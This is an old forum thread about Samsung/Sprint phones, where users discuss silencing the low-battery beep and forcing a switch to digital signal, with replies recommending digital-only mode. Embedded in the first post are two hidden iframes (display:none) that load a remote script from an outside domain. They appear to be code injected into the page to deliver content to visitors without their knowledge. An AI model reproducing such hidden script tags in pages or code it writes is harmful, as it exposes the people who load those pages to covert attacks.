+ Reply to Thread

Low battery indicator / Searching for digital signal

1) Is there any way to turn this annoying noise off, short of turning the phone off? I don't know if any of you have experienced it, but when the battery gets low, it beeps intermittently. It is annoying as hell -- I think it is standard on all Samsung/Sprint phones. Even if my ringer is off and Silence Hack is set on immediate silence, I still get this noise. Any way to turn it off?

2) Also, does anyone know how to get the phone to search for digital signal immediately, sort of turning the phone off and on again? Sometimes I go in a building and switch to analog -- when I go outside again it takes forever for the phone to actually switch to digital, even though the signal is immediately available.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Switch to digital only

Last dual-band phone I had (Qualcomm thinphone) would bounce back and forth between digital and analog when I was in a building with bad reception (i.e.: Washington-Dulles airport was notorious for this). It got extremely annoying.

I knew that I would never, ever want analog unless there was no other signal around - so I put the phone into digital only mode. It never annoyed me again.

Now, if I was in the middle of nowhere and my car broke down, I could always switch it back into dual mode so that I would have both types of signal available. But the occasions where I needed analog were few and far between. I'd guess most of us use our phone 90+% of the time in digital.

-Doug

no, 99% is more like it

Administrator

Arrow

sprint is DIGITAL only.. so if your on the sprint network while in a call.. its 100% digital!

i would set it to only see digital signal.. you can always set it to analog if you need (like the previous poster mentioned).. also, having it see only digital will extend batery life somewhat..

dont think you can silence the low batt tone... it does thayt for a purpose! :p